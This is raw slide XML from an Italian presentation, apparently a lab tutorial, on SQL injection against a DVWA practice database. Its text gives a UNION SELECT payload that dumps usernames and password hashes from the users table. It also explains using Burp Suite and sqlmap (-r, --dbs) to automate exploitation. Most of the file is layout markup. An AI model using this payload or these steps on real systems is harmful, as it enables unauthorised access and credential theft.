                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Come vediamo dalla figura a destra, tra tutte le colonne della tabella users, c’è anche la colonna </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2305">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4631"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 23" id="23"/>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4" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9698055" y="2527962"/>
            <a:ext cx="8065269" cy="6158573"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6158573" w="8065269">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8065269" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8065269" y="6158573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6158573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="-41133" t="-42260" r="-3343" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="d"/>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06209" y="325573"/>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10800000">
            <a:off x="11496334" y="-2996042"/>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4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="4936169" y="343116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10800000">
            <a:off x="-3129542" y="8451937"/>
            <a:ext cx="6259084" cy="5993073"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5993073" w="6259084">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6259084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6259084" y="5993073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5993073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9368946" y="3635829"/>
            <a:ext cx="8324212" cy="5268463"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5268463" w="8324212">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8324211" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8324211" y="5268463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5268463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="-39161" t="-52142" r="-10560" b="-25723"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1453322"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3.6 -   SQLI IN AZIONE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 8" id="8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="1673160" y="-753331"/>
            <a:ext cx="4884866" cy="9665546"/>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257" t="0" r="-22257"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8" id="1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9" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-642889">
            <a:off x="5524904" y="5671961"/>
            <a:ext cx="3300159" cy="2516371"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2516371" w="3300159">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3300159" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3300159" y="2516371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2516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1" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="12314662"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71572" y="2588331"/>
            <a:ext cx="8331849" cy="3681730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Infine con l’inserimento della seguente query chiediamo di mostrare tutti i valori presenti nella colonna password:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3220"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3220"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="TT Autonomous Mono Bold"/>
              </a:rPr>
              <a:t>‘ UNION SELECT first_name, password FROM users#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> In First name  abbiamo i nomi utente relativi agli ID da 1 a 5 e in Surname abbiamo le password codificate in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="287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06209" y="325573"/>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10800000">
            <a:off x="11496334" y="-2996042"/>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4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="5535072" y="3924377"/>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10800000">
            <a:off x="-2926398" y="8586643"/>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TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1470937"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3.6.1 -   SQLMAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 7" id="7"/>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5054181" y="5493907"/>
            <a:ext cx="8179639" cy="3764393"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3764393" w="8179639">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8179638" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8179638" y="3764393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3764393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 9" id="9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-5400000">
            <a:off x="2334798" y="6284222"/>
            <a:ext cx="1981523" cy="2213992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 10" id="10"/>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11" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="12314662"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Freeform 12" id="12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="10992940" y="-3964418"/>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TextBox 13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1214782" y="1628684"/>
            <a:ext cx="15484782" cy="33299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Un modo molto più rapido per eseguire un attacco SQL Injection è l'utilizzo del tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. Sqlmap è uno strumento open-source progettato per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>automatizzare il processo di rilevamento e sfruttamento delle vulnerabilità SQL Injection nei database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Con una vasta gamma di funzionalità, sqlmap è in grado di identificare e sfruttare diverse tecniche di SQL Injection, compresi gli attacchi basati su errori, unioni, e iniezioni cieche. Inoltre, il tool supporta vari database come MySQL, PostgreSQL, Oracle e Microsoft SQL Server, rendendolo estremamente versatile per i test di sicurezza delle applicazioni web.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 14" id="14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5400000">
            <a:off x="14116660" y="6284222"/>
            <a:ext cx="1981523" cy="2213992"/>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06209" y="325573"/>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10800000">
            <a:off x="11397657" y="-3047052"/>
            <a:ext cx="9990407" cy="9266102"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="9266102" w="9990407">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9990407" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9990407" y="9266103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9266103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="5584410" y="4067252"/>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10800000">
            <a:off x="-2926398" y="8586643"/>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TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1470937"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3.6.1-   SQLMAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 7" id="7"/>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10800000">
            <a:off x="10133777" y="-3047052"/>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Freeform 9" id="9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="6820004" y="1999274"/>
            <a:ext cx="10989316" cy="3415712"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3415712" w="10989316">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10989316" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10989316" y="3415712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3415712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 10" id="10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10300144" y="7416789"/>
            <a:ext cx="2082596" cy="2415908"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2415908" w="2082596">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2082596" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2082596" y="2415909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2415909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="-8544" t="0" r="-19225" b="-14731"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 11" id="11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="2910444">
            <a:off x="8707072" y="5720995"/>
            <a:ext cx="2085009" cy="2507959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 12" id="12"/>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13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="12314662"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4" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="153693" y="1961174"/>
            <a:ext cx="6357986" cy="29108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Per sfruttare al meglio SQLmap, ci si può avvalere di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, un tool ideato per i test di sicurezza delle web app.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Nel nostro caso, verrà utilizzato per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>intercettare la richiesta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>che viene effettuata al DB  quando si immette un carattere per la ricerca di un ID. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 15" id="15"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1840096" y="7497980"/>
            <a:ext cx="6261399" cy="8153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Intercettata la richiesta, la copieremo su un nuovo file di testo denominato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>dvwadb.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>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06209" y="325573"/>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10800000">
            <a:off x="14556148" y="-2996536"/>
            <a:ext cx="6259084" cy="5993073"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5993073" w="6259084">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6259084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6259084" y="5993072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5993072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="11496334" y="-2996042"/>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5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="5535072" y="3924377"/>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10800000">
            <a:off x="-2926398" y="8586643"/>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TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1470937"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3.6.1 -   SQLMAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="484643" y="1508310"/>
            <a:ext cx="9769895" cy="37490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Attiviamo ora sqlmap, indicandogli il file di testo da dove estrarre la richiesta che abbiamo salvato, così da potersi connettere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> in maniera autonoma al database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Il comando è il seguente:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Sqlmap:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>attiva sqlmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>-r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: indica il file da leggere e analizzare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="518160" indent="-259080" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>--dbs:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> chiede a sqlmap di enumerare tutti i database presenti nel server</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0322803" y="2542725"/>
            <a:ext cx="5471391" cy="1266236"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1266236" w="5471391">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5471391" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471391" y="1266237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1266237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 11" id="11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10685135" y="5257350"/>
            <a:ext cx="7270129" cy="3207410"/>
          </a:xfrm>
          <a:custGeom>
